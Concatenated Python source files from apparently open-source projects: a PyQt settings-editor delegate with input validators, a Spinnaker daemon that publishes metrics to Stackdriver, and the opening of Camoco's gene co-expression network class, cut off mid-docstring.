def childCount(self, parent):
if parent is not None:
return parent.childCount()
else:
return self.topLevelItemCount()
def findChild(self, parent, text, startIndex):
for i in range(self.childCount(parent)):
if self.childAt(parent, i).text(0) == text:
return i
return -1
def moveItemForward(self, parent, oldIndex, newIndex):
        for _ in range(oldIndex - newIndex):
self.deleteItem(parent, newIndex)
class VariantDelegate(QtGui.QItemDelegate):
def __init__(self, parent=None):
super(VariantDelegate, self).__init__(parent)
self.boolExp = QtCore.QRegExp()
self.boolExp.setPattern('true|false')
self.boolExp.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.byteArrayExp = QtCore.QRegExp()
self.byteArrayExp.setPattern('[\\x00-\\xff]*')
self.charExp = QtCore.QRegExp()
self.charExp.setPattern('.')
self.colorExp = QtCore.QRegExp()
self.colorExp.setPattern('\\(([0-9]*),([0-9]*),([0-9]*),([0-9]*)\\)')
self.doubleExp = QtCore.QRegExp()
self.doubleExp.setPattern('')
self.pointExp = QtCore.QRegExp()
self.pointExp.setPattern('\\((-?[0-9]*),(-?[0-9]*)\\)')
self.rectExp = QtCore.QRegExp()
self.rectExp.setPattern('\\((-?[0-9]*),(-?[0-9]*),(-?[0-9]*),(-?[0-9]*)\\)')
self.signedIntegerExp = QtCore.QRegExp()
self.signedIntegerExp.setPattern('-?[0-9]*')
self.sizeExp = QtCore.QRegExp(self.pointExp)
self.unsignedIntegerExp = QtCore.QRegExp()
self.unsignedIntegerExp.setPattern('[0-9]*')
self.dateExp = QtCore.QRegExp()
self.dateExp.setPattern('([0-9]{,4})-([0-9]{,2})-([0-9]{,2})')
self.timeExp = QtCore.QRegExp()
self.timeExp.setPattern('([0-9]{,2}):([0-9]{,2}):([0-9]{,2})')
self.dateTimeExp = QtCore.QRegExp()
self.dateTimeExp.setPattern(self.dateExp.pattern() + 'T' + self.timeExp.pattern())
def paint(self, painter, option, index):
if index.column() == 2:
value = index.model().data(index, QtCore.Qt.UserRole)
if not self.isSupportedType(value):
myOption = QtGui.QStyleOptionViewItem(option)
myOption.state &= ~QtGui.QStyle.State_Enabled
super(VariantDelegate, self).paint(painter, myOption, index)
return
super(VariantDelegate, self).paint(painter, option, index)
def createEditor(self, parent, option, index):
if index.column() != 2:
return None
originalValue = index.model().data(index, QtCore.Qt.UserRole)
if not self.isSupportedType(originalValue):
return None
lineEdit = QtGui.QLineEdit(parent)
lineEdit.setFrame(False)
if isinstance(originalValue, bool):
regExp = self.boolExp
elif isinstance(originalValue, float):
regExp = self.doubleExp
elif isinstance(originalValue, int):
regExp = self.signedIntegerExp
elif isinstance(originalValue, QtCore.QByteArray):
regExp = self.byteArrayExp
elif isinstance(originalValue, QtGui.QColor):
regExp = self.colorExp
elif isinstance(originalValue, QtCore.QDate):
regExp = self.dateExp
elif isinstance(originalValue, QtCore.QDateTime):
regExp = self.dateTimeExp
elif isinstance(originalValue, QtCore.QTime):
regExp = self.timeExp
elif isinstance(originalValue, QtCore.QPoint):
regExp = self.pointExp
elif isinstance(originalValue, QtCore.QRect):
regExp = self.rectExp
elif isinstance(originalValue, QtCore.QSize):
regExp = self.sizeExp
else:
regExp = QtCore.QRegExp()
if not regExp.isEmpty():
validator = QtGui.QRegExpValidator(regExp, lineEdit)
lineEdit.setValidator(validator)
return lineEdit
def setEditorData(self, editor, index):
value = index.model().data(index, QtCore.Qt.UserRole)
if editor is not None:
editor.setText(self.displayText(value))
def setModelData(self, editor, model, index):
if not editor.isModified():
return
text = editor.text()
validator = editor.validator()
if validator is not None:
state, text, _ = validator.validate(text, 0)
if state != QtGui.QValidator.Acceptable:
return
originalValue = index.model().data(index, QtCore.Qt.UserRole)
if isinstance(originalValue, QtGui.QColor):
self.colorExp.exactMatch(text)
value = QtGui.QColor(min(int(self.colorExp.cap(1)), 255),
min(int(self.colorExp.cap(2)), 255),
min(int(self.colorExp.cap(3)), 255),
min(int(self.colorExp.cap(4)), 255))
elif isinstance(originalValue, QtCore.QDate):
value = QtCore.QDate.fromString(text, QtCore.Qt.ISODate)
if not value.isValid():
return
elif isinstance(originalValue, QtCore.QDateTime):
value = QtCore.QDateTime.fromString(text, QtCore.Qt.ISODate)
if not value.isValid():
return
elif isinstance(originalValue, QtCore.QTime):
value = QtCore.QTime.fromString(text, QtCore.Qt.ISODate)
if not value.isValid():
return
elif isinstance(originalValue, QtCore.QPoint):
self.pointExp.exactMatch(text)
value = QtCore.QPoint(int(self.pointExp.cap(1)),
int(self.pointExp.cap(2)))
elif isinstance(originalValue, QtCore.QRect):
self.rectExp.exactMatch(text)
value = QtCore.QRect(int(self.rectExp.cap(1)),
int(self.rectExp.cap(2)),
int(self.rectExp.cap(3)),
int(self.rectExp.cap(4)))
elif isinstance(originalValue, QtCore.QSize):
self.sizeExp.exactMatch(text)
value = QtCore.QSize(int(self.sizeExp.cap(1)),
int(self.sizeExp.cap(2)))
elif isinstance(originalValue, list):
value = text.split(',')
else:
value = type(originalValue)(text)
model.setData(index, self.displayText(value), QtCore.Qt.DisplayRole)
model.setData(index, value, QtCore.Qt.UserRole)
@staticmethod
def isSupportedType(value):
return isinstance(value, (bool, float, int, QtCore.QByteArray,
str, QtGui.QColor, QtCore.QDate, QtCore.QDateTime,
QtCore.QTime, QtCore.QPoint, QtCore.QRect, QtCore.QSize,
list))
@staticmethod
def displayText(value):
if isinstance(value, (bool, int, QtCore.QByteArray)):
return str(value)
if isinstance(value, str):
return value
elif isinstance(value, float):
return '%g' % value
elif isinstance(value, QtGui.QColor):
return '(%u,%u,%u,%u)' % (value.red(), value.green(), value.blue(), value.alpha())
elif isinstance(value, (QtCore.QDate, QtCore.QDateTime, QtCore.QTime)):
return value.toString(QtCore.Qt.ISODate)
elif isinstance(value, QtCore.QPoint):
return '(%d,%d)' % (value.x(), value.y())
elif isinstance(value, QtCore.QRect):
return '(%d,%d,%d,%d)' % (value.x(), value.y(), value.width(), value.height())
elif isinstance(value, QtCore.QSize):
return '(%d,%d)' % (value.width(), value.height())
elif isinstance(value, list):
return ','.join(value)
elif value is None:
return '<Invalid>'
return '<%s>' % value
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
mainWin = MainWindow()
mainWin.show()
sys.exit(app.exec_())
|
cherry-wb/SideTools
|
examples/tools/settingseditor/settingseditor.py
|
Python
|
apache-2.0
| 26,175
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring
import copy
import json
import logging
import re
import time
import traceback
import google_service
import spectator_client
import stackdriver_descriptors
import httplib2
try:
from urllib2 import (
Request as urllibRequest,
urlopen as urllibUrlopen)
except ImportError:
from urllib.request import (
Request as urllibRequest,
urlopen as urllibUrlopen)
try:
from googleapiclient.errors import HttpError
STACKDRIVER_AVAILABLE = True
except ImportError:
STACKDRIVER_AVAILABLE = False
class StackdriverMetricsService(google_service.GoogleMonitoringService):
"""Helper class for interacting with Stackdriver."""
SERVICE_SCOPE = 'https://www.googleapis.com/auth/monitoring'
SERVICE_KEY = 'stackdriver'
SERVICE_NAME = 'monitoring'
SERVICE_VERSION = 'v3'
MAX_BATCH = 200
JANITOR_PERIOD = 600
@property
def stackdriver_options(self):
return self.service_options
@property
def descriptor_manager(self):
"""Return MetricDescriptorManager."""
return self.__descriptor_manager
def __init__(self, stub_factory, options):
"""Constructor.
Args:
stub_factory: [callable that creates stub for stackdriver]
This is passed as a callable to defer initialization because
we create the handlers before we process commandline args.
"""
super(StackdriverMetricsService, self).__init__(
stub_factory, options)
# The janitor prepares metric descriptors before first write.
self.__janitor_func = lambda: self.__auto_audit_metric_descriptors()
self.__next_janitor_time = time.time()
self.__good_janitor_count = 0
self.__distributions_also_have_count = self.service_options.get(
'distributions_also_have_count')
self.__fix_custom_metrics_unsafe = self.service_options.get(
'fix_custom_metrics_unsafe', False)
self.__log_400_data = self.service_options.get('log_400_data', False)
manager_options = dict(options)
manager_options['spectator'] = self.spectator_helper.options
manager = stackdriver_descriptors.MetricDescriptorManager(
self, spectator_client.ResponseProcessor(manager_options))
self.__descriptor_manager = manager
@staticmethod
def add_parser_arguments(parser):
"""Add arguments for configuring stackdriver."""
parser.add_argument('--project', default='')
parser.add_argument('--zone', default='')
parser.add_argument('--instance_id', default=0, type=int)
parser.add_argument('--credentials_path', default=None)
parser.add_argument(
'--stackdriver_generic_task_resources',
default=False,
action='store_true',
help='Use stackdriver "generic_task" monitored resources'
' rather than the container or VM.')
parser.add_argument(
'--manage_stackdriver_descriptors',
choices=['none', 'full', 'create', 'delete'],
help='Specifies how to maintain stackdriver descriptors on startup.'
'\n none: Do nothing.'
'\n create: Only create new descriptors seen in the'
' metric filter default.yml'
'\n delete: Only delete existing descriptors no longer'
' mentioned in filter default.yml'
'\n full: Both create and delete.')
def __auto_audit_metric_descriptors(self):
"""The janitor function attempts to bring Stackdriver into compliance.
If the metric descriptors are already as expected then we'll disable
the janitor for the rest of the process' lifetime. Otherwise we'll
continue to call it and try again around every JANITOR_PERIOD seconds
to give time for the system to settle down.
The reason we expect to have problems is that old replicas are still
running and recreating the descriptors we are trying to delete when
stackdriver automatically creates metrics they are attempting to write.
If this is the case, we'll keep trying to clear them out until, eventually,
the old processes are no longer around to overwrite us.
Should something re-emerge then we'll be messed up until the next restart.
Note that each replica of each service is probably trying to create all
the descriptors so there is a lot of activity here. Since the descriptors
are all the same, there should not be a problem with these replicas
conflicting or needing coordination.
Note if management is disabled then this will be in a stable state
though still inconsistent with stackdriver because there will not
be any errors or activity performed.
"""
secs_remaining = self.__next_janitor_time - time.time()
if secs_remaining > 0:
logging.debug('Janitor skipping audit for at least another %d secs',
secs_remaining)
return
logging.info('Janitor auditing metric descriptors...')
scoped_options = {'stackdriver': self.service_options}
audit_results = self.descriptor_manager.audit_descriptors(scoped_options)
stable = (audit_results.errors == 0
and audit_results.num_fixed_issues == 0)
now = time.time()
self.__next_janitor_time = now + self.JANITOR_PERIOD
if stable:
self.__good_janitor_count += 1
if self.__good_janitor_count > 1:
logging.info('Metric descriptors appear stable. Disabling janitor.')
self.__janitor_func = lambda: None
else:
logging.info('Keeping janitor around to build confidence.')
else:
self.__good_janitor_count = 0
logging.debug('Metric descriptors are not yet stable.'
' There may be some errors writing metrics.'
' Check again in %d secs.',
self.JANITOR_PERIOD)
def add_metric_to_timeseries(self, service, name, instance,
metric_metadata, service_metadata, result):
data_list = [
google_service.GoogleMeasurementData.make_from_measurement(
self, service_metadata, metric_metadata, measurement)
for measurement in instance['values']
]
if not data_list:
return
sample = data_list[0]
points = [{'interval': {'endTime': data.endTime}, 'value': data.valueData}
for data in data_list]
if sample.metricKind == 'CUMULATIVE':
for elem in points:
elem['interval']['startTime'] = sample.startTime
name, tags = self.spectator_helper.normalize_name_and_tags(
service, name, instance, metric_metadata)
metric = {
'type': self.descriptor_manager.name_to_type(name),
'labels': {tag['key']: tag['value'] for tag in tags}
}
monitored_resource = self.get_monitored_resource(service, service_metadata)
if (sample.valueType == 'DISTRIBUTION'
and self.__distributions_also_have_count):
# Add an implied metric which is just a counter.
# This is to workaround a temporary shortcoming querying the counts.
# Eventually this will be deprecated.
counter_points = copy.deepcopy(points)
for elem in counter_points:
elem['value'] = {
'int64Value': int(sample.valueData['distributionValue']['count'])
}
counter_metric = copy.deepcopy(metric)
counter_metric['type'] = self.__descriptor_manager.distribution_to_counter(
counter_metric['type'])
result.append({
'metric': counter_metric,
'resource': monitored_resource,
'metricKind': 'CUMULATIVE',
'valueType': 'INT64',
'points': counter_points})
result.append({
'metric': metric,
'resource': monitored_resource,
'metricKind': sample.metricKind,
'valueType': sample.valueType,
'points': points})
def publish_metrics(self, service_metrics):
self.__janitor_func()
time_series = []
self._update_monitored_resources(service_metrics)
spectator_client.foreach_metric_in_service_map(
service_metrics, self.add_metric_to_timeseries, time_series)
offset = 0
method = self.stub.projects().timeSeries().create
while offset < len(time_series):
last = min(offset + self.MAX_BATCH, len(time_series))
chunk = time_series[offset:last]
try:
(method(name=self.project_to_resource(self.project),
body={'timeSeries': chunk})
.execute())
except HttpError as err:
self.handle_time_series_http_error(err, chunk)
offset = last
return len(time_series)
def find_problematic_elements(self, error, batch):
try:
content = json.JSONDecoder().decode(error.content.decode('utf-8'))
message = content['error']['message']
except KeyError:
return []
if self.__log_400_data:
time_series_index_pattern = r'timeSeries\[(\d+?)\]'
log_count = 0
for match in re.finditer(time_series_index_pattern, message):
ts_index = int(match.group(1))
log_count += 1
if log_count > 3:
break
logging.info('timeSeries[%d] -> %r', ts_index,batch[ts_index])
time_series_range_pattern = r'timeSeries\[(\d+?)\-(\d+?)\]'
for match in re.finditer(time_series_range_pattern, message):
ts_start_index = int(match.group(1))
ts_end_index = int(match.group(2))
text = []
for index in range(ts_start_index, ts_end_index):
text.append('[%d] -> %r' % (index, batch[index]))
logging.info('\n%s', '\n'.join(text))
break
found = []
counter_to_gauge_pattern = (
r'timeSeries\[(\d+?)\]\.metricKind'
r' had an invalid value of \"(CUMULATIVE|GAUGE)\"'
r'.* must be (CUMULATIVE|GAUGE).')
for match in re.finditer(counter_to_gauge_pattern, message):
ts_index = int(match.group(1))
metric = batch[ts_index]['metric']
metric_type = metric['type']
found.append((self.delete_descriptor_and_retry,
metric_type, batch[ts_index]))
return found
def delete_descriptor_and_retry(self, metric_type, ts_request):
metric_name_param = '/'.join([
self.project_to_resource(self.project),
'metricDescriptors', metric_type])
api = self.stub.projects().metricDescriptors()
try:
logging.info('Deleting existing descriptor %s', metric_name_param)
response = api.delete(name=metric_name_param).execute()
logging.info('Delete response: %s', repr(response))
except HttpError as err:
logging.error('Could not delete descriptor %s', err)
if err.resp.status != 404:
return
else:
logging.info("Ignore error.")
logging.info('Retrying create timeseries %s', ts_request)
(self.stub.projects().timeSeries().create(
name=self.project_to_resource(self.project),
body={'timeSeries': ts_request})
.execute())
def handle_time_series_http_error(self, error, batch):
logging.error('Caught %s', error)
if error.resp.status == 400:
problems = self.find_problematic_elements(error, batch)
logging.info('PROBLEMS %r', problems)
if problems and not self.__fix_custom_metrics_unsafe:
logging.info(
'Fixing this problem would wipe stackdriver data.'
' Doing so was not enabled. To enable, add:\n\n'
'stackdriver:\n fix_custom_metrics_unsafe: true\n'
'to your spinnaker-monitoring-local.yml')
elif problems:
logging.info('Attempting to fix these problems. This may lose'
' stackdriver data for these metrics.')
for elem in problems:
try:
elem[0](*elem[1:])
except BaseException as bex:
traceback.print_exc()
logging.error('Failed %s(%s): %s', elem[0], elem[1:], bex)
class StackdriverServiceFactory(google_service.GoogleMonitoringServiceFactory):
SERVICE_CLASS = StackdriverMetricsService
def add_argparser(self, parser):
"""Implements server_handlers.MonitorCommandHandler interface."""
StackdriverMetricsService.add_parser_arguments(parser)
parser.add_argument('--stackdriver', default=False, action='store_true',
dest='monitor_stackdriver',
help='Publish metrics to Stackdriver.')
parser.add_argument(
'--fix_stackdriver_labels_unsafe', default=True,
action='store_true', help='DEPRECATED')
parser.add_argument(
'--nofix_stackdriver_labels_unsafe',
dest='fix_stackdriver_labels_unsafe',
action='store_false', help='DEPRECATED')
def make_service(options, factory=StackdriverServiceFactory):
return factory()(options, None)
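# Illustrative sketch (editor's addition, not part of the daemon): wiring the
# stackdriver flags defined above into a plain argparse parser. The project id
# used here is a placeholder value.
if __name__ == '__main__':
  import argparse
  parser = argparse.ArgumentParser()
  StackdriverMetricsService.add_parser_arguments(parser)
  opts = parser.parse_args(['--project', 'my-project',
                            '--manage_stackdriver_descriptors', 'create'])
  print(opts.project, opts.manage_stackdriver_descriptors)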
|
spinnaker/spinnaker-monitoring
|
spinnaker-monitoring-daemon/spinnaker-monitoring/stackdriver_service.py
|
Python
|
apache-2.0
| 13,237
|
#!/usr/bin/python3
import warnings
warnings.simplefilter(action="ignore", category=FutureWarning)
import camoco.PCCUP as PCCUP
from .Camoco import Camoco
from .RefGen import RefGen
from .Locus import Locus, Gene
from .Expr import Expr
from .Tools import memoize, available_datasets
from .Term import Term
from .Ontology import Ontology
from math import isinf
from numpy import matrix, arcsinh, tanh
from collections import defaultdict, Counter
from itertools import chain
from matplotlib.collections import LineCollection
from subprocess import Popen, PIPE
from scipy.spatial.distance import squareform
from scipy.special import comb
from scipy.stats import norm, pearsonr
from scipy.cluster.hierarchy import linkage, leaves_list, dendrogram
from statsmodels.sandbox.regression.predstd import wls_prediction_std
from io import UnsupportedOperation
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import statsmodels.api as sm
import networkx as nx
import pandas as pd
import numpy as np
import itertools
import fastcluster
import psutil
from odo import odo
from matplotlib import rcParams
rcParams.update({"figure.autolayout": True})
import operator
import statsmodels.api as sm
import sys
import pdb
import json
import gc
class COB(Expr):
"""
A COB object represents an easily browsable Co-expression network.
(COB-> co-expression browser)
"""
def __init__(self, name): # pragma: no cover
"""
Initialize a built co-expression network
Parameters
----------
name : str
The name of the co-expression network (from when it was built)
Returns
-------
cob : COB
A COB object
"""
super().__init__(name=name)
self.log("Loading Coex table")
self.coex = self._bcolz("coex", blaze=True)
self.sigs = None
if self.coex is None:
self.log("{} is empty", name)
if not self._global("significance_threshold") is None:
self.set_sig_edge_zscore(float(self._global("significance_threshold")))
self.log("Loading Global Degree")
self.degree = self._bcolz("degree")
if self.degree is None:
self.log("{} is empty", name)
if (
not available_datasets("Ontology", "{}MCL".format(name))
and self.coex is not None
):
self._calculate_clusters()
self.log("Loading Clusters")
self.clusters = self._bcolz("clusters")
if self.clusters is None:
self.log("Clusters not loaded for: {} ()", name)
self.MCL = None
else:
self.MCL = Ontology("{}MCL".format(self.name))
def __repr__(self):
return "<COB: {}>".format(self.name)
def __str__(self):
return self.__repr__()
def summary(self, file=sys.stdout): # pragma: no cover
"""
Returns a nice summary of what is in the network.
Parameters
----------
file : str,default=stdout,optional
Returns
-------
None
The summary is printed either to stdout or a provided file.
"""
import camoco as co
print(
f"""
CAMOCO (version:{co.__version__})
---------------------------------------
COB Dataset: {self.name}
Desc: {self.description}
RawType: {self.rawtype}
TransformationLog: {self._transformation_log}
Num Genes: {self.num_genes():,}({(self.num_genes() / self.num_genes(raw=True)) * 100:.2g}% of total)
Num Accessions: {self.num_accessions()}
Network Stats
-------------
Unthresholded Interactions: {len(self.coex):,}
Thresholded (Z >= {self._global("current_significance_threshold")}): {len(self.sigs):,}
Raw
------------------
Num Raw Genes: {len(self.expr(raw=True)):,}
Num Raw Accessions: {len(self.expr(raw=True).columns)}
QC Parameters
------------------
min expr level: {self._global("qc_min_expr")}
- expression below this is set to NaN
max gene missing data: {self._global("qc_max_gene_missing_data")}
- genes missing more than this percent are removed
max accession missing data: {self._global("qc_max_accession_missing_data")}
- Accession missing more than this percent are removed
min single sample expr: {self._global("qc_min_single_sample_expr")}
- genes must have this amount of expression in
at least one accession.
Clusters
------------------
Num clusters (size >= 10): {sum(self.clusters.groupby("cluster").apply(len) >= 10)}
""",
file=file,
)
def qc_gene(self):
"""
Returns qc statistics broken down by chromosome
        Parameters
----------
None
Returns
-------
DataFrame
A dataframe containing QC info
"""
qc_gene = self._bcolz("qc_gene")
        # generate the parent refgen
rg = self._parent_refgen
qc_gene["chrom"] = [rg[x].chrom if x in rg else "None" for x in qc_gene.index]
return qc_gene.groupby("chrom").aggregate(sum, axis=0)
@property
@memoize
    def edge_FDR(self):
"""
Returns a calculated false discovery rate of the Edges. This is
calculated from the number of expected edges from the standard normal
distribution, which a network will follow if the gene expression matrix
is simply random data. This function looks at the number of expected
'significant' edges and divides that by the number of observed edges in
the network.
Parameters
-----------
None
Returns
-------
FDR : float
The ratio of expected edges / observed edges
"""
# get the percent of significant edges
num_sig = self.coex.significant.coerce(to="int32").sum() / len(self.coex)
# calulate the number expected
num_exp = 1 - norm.cdf(float(self._global("significance_threshold")))
# FDR is the percentage expected over the percentage found
return num_exp / num_sig
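    # Worked example of the ratio above (editor's note; the numbers are illustrative):
    # with a significance threshold of 3.0, num_exp = 1 - norm.cdf(3.0) ~= 0.00135.
    # If 0.4% of all pairwise edges actually pass that threshold (num_sig = 0.004),
    # the edge FDR is roughly 0.00135 / 0.004 ~= 0.34, i.e. about a third of the
    # "significant" edges would be expected from random expression data alone.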
def set_sig_edge_zscore(self, zscore):
"""
Sets the 'significance' threshold for the coex network. This will
affect thresholded network metrics that use degree (e.g. locality)
It will not affect unthresholded metrics like Density.
Parameters
----------
zscore : float
the new significance threshold
Returns
-------
None
"""
# Don't do anything if there isn't a coex table
if self.coex is None:
return
# Only update if needed
cur_sig = self._global("current_significance_threshold")
new_sig = cur_sig is None or not (float(cur_sig) == zscore)
# Set the new significant value
if new_sig:
# If the column doesn't exist because of an error it may fail
try:
self.coex.data.delcol(name="significant")
except ValueError:
pass
# Add the column to the underlying data structure
self.coex.data.addcol(
self.coex.data.eval("score >= " + str(zscore)),
pos=2,
name="significant",
)
self.coex.data.flush()
# Keep track of the current threshold
self._global("current_significance_threshold", zscore)
self._calculate_degree(update_db=False)
# Rebuild significant index set
if new_sig or self.sigs is None:
self.sigs = np.array(
[ind for ind in self.coex.data["significant"].wheretrue()]
)
self.sigs.sort()
return None
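    # Usage note (editor's addition): e.g. cob.set_sig_edge_zscore(3.0) re-flags every
    # edge with score >= 3.0 as significant, recomputes degree, and rebuilds self.sigs;
    # unthresholded statistics such as density() are unaffected by this call.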
def _coex_DataFrame(self, ids=None, sig_only=True):
"""
Converts the underlying coexpression table into
a pandas dataframe
Parameters
----------
ids : array-like of ints (default: None)
Indices to include in the data frame. Usually
computed from another COB method (e.g.
PCCUP.coex_index). If None, then all indices
will be included.
sig_only : bool (default: True)
If true, only "significant" edges will be
included in the table. If False, all edges will
be included.
Returns
-------
A Pandas Dataframe
.. warning:: This will put the entire gene-by-accession
dataframe into memory.
"""
# If no ids are provided, get all of them
if ids is None:
if sig_only:
ids = self.sigs
else:
return self.coex.data.todataframe()
else:
ids.sort()
if sig_only:
ids = np.intersect1d(ids, self.sigs, assume_unique=True)
# Get the DataFrame
df = pd.DataFrame.from_items(
((key, self.coex.data[key][ids]) for key in self.coex.data.names)
)
# df = odo(self.coex[ids],pd.DataFrame)
df.set_index(ids, inplace=True)
return df
def neighbors(
self,
gene,
sig_only=True,
names_as_index=True,
names_as_cols=False,
return_gene_set=False,
):
"""
Returns a DataFrame containing the neighbors for gene.
Parameters
----------
gene : co.Locus
The gene for which to extract neighbors
sig_only : bool (default: True)
A flag to include only significant interactions.
names_as_index : bool (default: True)
Include gene names as the index. If this and `names_as_cols` are
both False, only the interactions are returned which is a faster
operation than including gene names.
names_as_cols : bool (default: False)
Include gene names as two columns named 'gene_a' and 'gene_b'.
return_gene_set : bool (default: False)
Return the set of neighbors instead of a dataframe
Returns
-------
- A DataFrame containing edges
- A Gene set IF return_gene_set is true
"""
# Find the neighbors
gene_id = self._get_gene_index(gene)
ids = PCCUP.coex_neighbors(gene_id, self.num_genes())
edges = self._coex_DataFrame(ids=ids, sig_only=sig_only)
del ids
if len(edges) == 0:
edges = pd.DataFrame(
columns=["gene_a", "gene_b", "score", "distance", "significant"]
)
if names_as_cols:
return edges
else:
return edges.set_index(["gene_a", "gene_b"])
if return_gene_set:
names_as_index = True
# Find the indexes if necessary
if names_as_index or names_as_cols:
names = self._expr.index.values
ids = edges.index.values
ids = PCCUP.coex_expr_index(ids, self.num_genes())
edges.insert(0, "gene_a", names[ids[:, 0]])
edges.insert(1, "gene_b", names[ids[:, 1]])
del ids
del names
if return_gene_set:
neighbors = set(self.refgen[set(edges["gene_a"]).union(edges["gene_b"])])
if len(neighbors) == 1:
return set()
neighbors.remove(gene)
return neighbors
if names_as_index and not names_as_cols:
edges = edges.set_index(["gene_a", "gene_b"])
return edges
def neighborhood(self, gene_list, return_genes=False, neighbors_only=False):
"""
        Find the genes that have network connections to the gene_list.
Parameters
----------
Input: A gene List
The gene list used to obtain the neighborhood.
Returns
-------
A Dataframe containing gene ids which have at least
one edge with another gene in the input list. Also returns
global degree
"""
if isinstance(gene_list, Locus):
gene_list = [gene_list]
gene_list = set(gene_list)
neighbors = set()
for gene in gene_list:
neighbors.update(self.neighbors(gene, sig_only=True, return_gene_set=True))
# Remove the neighbors who are in the gene_list
neighbors = neighbors.difference(gene_list)
if return_genes == False:
neighbors = pd.DataFrame({"gene": [x.id for x in neighbors]})
neighbors["neighbor"] = True
local = pd.DataFrame({"gene": [x.id for x in gene_list]})
local["neighbor"] = False
if neighbors_only == False:
return pd.concat([local, neighbors])
else:
return neighbors
elif return_genes == True:
if neighbors_only == False:
neighbors.update(gene_list)
return neighbors
else:
return neighbors
def next_neighbors(
self, gene_list, n=None, return_table=False, include_query=False
):
"""
Given a set of input genes, return the next (n) neighbors
        that have the strongest connection to the input set.
Parameters
----------
gene_list : list-like of co.Locus
An iterable of genes for which the next neighbors will be
calculated.
n : int (default: None)
The number of next neighbors to return. If None, the method
will return ALL neighbors
return_table : bool (default:False)
If true, a table with neighbors and scores will be
returned
include_query : bool (default:False)
If True (and return table is False) the query gene(s) will
be included in the return list
Returns
-------
returns a list containing the strongest connected neighbors
"""
if isinstance(gene_list, Locus):
gene_list = [gene_list]
neighbors = defaultdict(lambda: 0)
for gene in set(gene_list):
edges = self.neighbors(gene, names_as_cols=True)
source_id = gene.id
for g1, g2, score in zip(edges["gene_a"], edges["gene_b"], edges["score"]):
if g1 == source_id:
neighbors[g2] += score
else:
neighbors[g1] += score
neighbors = sorted(neighbors.items(), key=operator.itemgetter(1), reverse=True)
if n != None:
neighbors = neighbors[:n]
if return_table == True:
return pd.DataFrame(neighbors, columns=["neighbor", "score"])
else:
neighbors = set(self.refgen[[x[0] for x in neighbors]])
if include_query == True:
neighbors.update(gene_list)
return neighbors
def coexpression(self, gene_a, gene_b):
"""
Returns a coexpression z-score between two genes. This
is the pearson correlation coefficient of the two genes'
expression profiles across the accessions (experiments).
        This value is pulled from the stored coex table.
Parameters
----------
gene_a : camoco.Locus
The first gene
gene_b : camoco.Locus
The second gene
Returns
Coexpression Z-Score
"""
if gene_a.id == gene_b.id:
# We don't cache these results
score = self._coex_concordance(gene_a, gene_b)
significant = 0
distance = 0
return pd.Series(
[score, significant, distance],
name=(gene_a.id, gene_b.id),
index=["score", "significant", "distance"],
)
return self.subnetwork([gene_a, gene_b], sig_only=False).iloc[0]
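    # Usage sketch (editor's addition; the two Locus objects are placeholders):
    #   edge = cob.coexpression(gene_a, gene_b)
    #   edge.score       -> coexpression z-score of the two expression profiles
    #   edge.significant -> whether the score passes the current significance threshold
    #   edge.distance    -> inter-genic distance between the two loci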
def subnetwork(
self,
gene_list=None,
sig_only=True,
min_distance=None,
filter_missing_gene_ids=True,
trans_locus_only=False,
names_as_index=True,
names_as_cols=False,
):
"""
Extract a subnetwork of edges exclusively between genes
within the gene_list. Also includes various options for
what information to report, see Parameters.
Parameters
----------
gene_list : iter of Loci
The genes from which to extract a subnetwork.
If gene_list is None, the function will assume
gene_list is all genes in COB object (self).
sig_only : bool
A flag to include only significant interactions.
        min_distance : int (default: None)
If not None, only include interactions that are
between genes that are a `min_distance` away from
one another.
filter_missing_gene_ids : bool (default: True)
Filter out gene ids that are not in the current
COB object (self).
        trans_locus_only : bool (default: False)
Filter out gene interactions that are not in Trans,
this argument requires that locus attr object has
the 'parent_locus' key:val set to distinguish between
cis and trans elements.
names_as_index : bool (default: True)
Include gene names as the index.
names_as_cols : bool (default: False)
Include gene names as two columns named 'gene_a' and 'gene_b'.
Returns
-------
A pandas.DataFrame containing the edges. Columns
include score, significant (bool), and inter-genic distance.
"""
num_genes = self.num_genes()
if gene_list is None:
# Return the entire DataFrame
df = self._coex_DataFrame(sig_only=sig_only)
else:
# Extract the ids for each Gene
gene_list = set(sorted(gene_list))
ids = np.array([self._expr_index[x.id] for x in gene_list])
if filter_missing_gene_ids:
# filter out the Nones
ids = np.array([x for x in ids if x is not None])
if len(ids) == 0:
df = pd.DataFrame(columns=["score", "significant", "distance"])
else:
# Grab the coexpression indices for the genes
ids = PCCUP.coex_index(ids, num_genes)
df = self._coex_DataFrame(ids=ids, sig_only=sig_only)
del ids
if min_distance is not None:
df = df[df.distance >= min_distance]
if names_as_index or names_as_cols or trans_locus_only:
names = self._expr.index.values
ids = df.index.values
if len(ids) > 0:
ids = PCCUP.coex_expr_index(ids, num_genes)
df.insert(0, "gene_a", names[ids[:, 0]])
df.insert(1, "gene_b", names[ids[:, 1]])
del ids
del names
else:
df.insert(0, "gene_a", [])
df.insert(0, "gene_b", [])
if names_as_index and not names_as_cols:
df = df.set_index(["gene_a", "gene_b"])
if trans_locus_only:
try:
parents = {x.id: x.attr["parent_locus"] for x in gene_list}
except KeyError as e:
raise KeyError(
"Each locus must have 'parent_locus'"
" attr set to calculate trans only"
)
df["trans"] = [
parents[gene_a] != parents[gene_b]
for gene_a, gene_b in zip(
df.index.get_level_values(0), df.index.get_level_values(1)
)
]
return df
def trans_locus_density(
self,
locus_list,
flank_limit,
return_mean=True,
bootstrap=False,
by_gene=False,
iter_name=None,
):
"""
Calculates the density of edges which span loci. Must take in a locus
        list so we can exclude cis-locus interactions.
Parameters
----------
locus_list : iter of Loci
an iterable of loci
flank_limit : int
The number of flanking genes passed to be pulled out
for each locus (passed onto the refgen.candidate_genes method)
return_mean : bool (default: True)
If false, raw edges will be returned
bootstrap : bool (default: False)
If true, candidate genes will be bootstrapped from the COB
reference genome
by_gene : bool (default: False)
Return a per-gene breakdown of density within the subnetwork.
iter_name : str (default: None)
Optional string which will be added as a column. Useful for
